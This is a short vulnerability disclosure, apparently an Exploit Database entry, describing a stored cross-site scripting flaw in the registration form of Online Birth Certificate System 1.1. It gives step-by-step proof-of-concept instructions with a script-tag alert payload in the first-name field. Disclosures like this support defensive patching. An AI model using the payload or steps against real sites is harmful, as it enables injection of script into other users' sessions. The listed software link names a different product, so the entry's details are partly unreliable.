Online Birth Certificate System 1.1 – ‘Multiple’ Stored Cross-Site Scripting (XSS)

• Exploit Database
• 16 阅读

• 作者： Subhadip Nag
  日期： 2021-07-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50089/

• # Exploit Title: Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS) 
  # Date: 03 July 2021
  # Exploit Author: Subhadip Nag
  # Author Linkedin: www.linkedin.com/in/subhadip-nag-09/
  # Vendor Homepage: https://phpgurukul.com
  # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
  # Version: 1.1
  # Tested on: Server: XAMPP
  
  # Description #
  
  Online Birth Certificate System 1.1 is vulnerable to stored cross site scripting (xss) in the registration form because of insufficient user supplied data.
  
  
  # Proof of Concept (PoC) : Exploit #
  
  1) Goto: http://localhost/OBCS/obcs/user/register.php
  2) In the first name field, enter the payload: <script>alert(1)</script>
  3) Click Register
  4) Goto: http://localhost/OBCS/obcs/user/login.php
  5) Enter your mobile number, password & click login
  6) our XSS attack successfull
  
  # PoC image
  1) https://ibb.co/7C6g6nK